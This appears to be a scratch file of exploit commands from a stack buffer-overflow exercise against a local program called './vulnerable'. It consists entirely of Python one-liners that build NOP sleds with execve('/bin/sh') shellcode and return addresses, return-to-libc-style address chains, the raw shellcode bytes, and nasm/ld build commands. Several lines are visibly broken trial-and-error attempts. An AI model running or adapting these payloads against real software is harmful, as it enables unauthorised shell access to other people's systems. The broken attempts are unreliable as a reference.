python3 -c 'print("\x90" * 40 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\x52\xb0\x0b\xcd\x80" + "\xb0\x84\x04\x08")' > payload.txt

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\x52\xb0\x0b\xcd\x80


python3 -c 'print("\x90" * 64 + "\xf0\x28\x05\x00" + "\xd0\x3d\x02\x00" + "\x00\xe0\xff\x7f")' | ./vulnerable

python3 -c 'print(b"\x90" * 64 + b"\xf0\x28\x05\x00" + b"\xd0\x3d\x02\x00" + b"\x00\xe0\xff\x7f")' | ./vulnerable

python3 -c 'print("asdffjjj")' | ./vulnerable

python -c 'print("\x90" + "0x528f0" + "0x42280" + "\x00\xe0\xff\x7f")' | ./vulnerable

nasm -f elf32 -o shellcode.o shellcode.asm

ld -m elf_i386 -o shellcode shellcode.o


\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80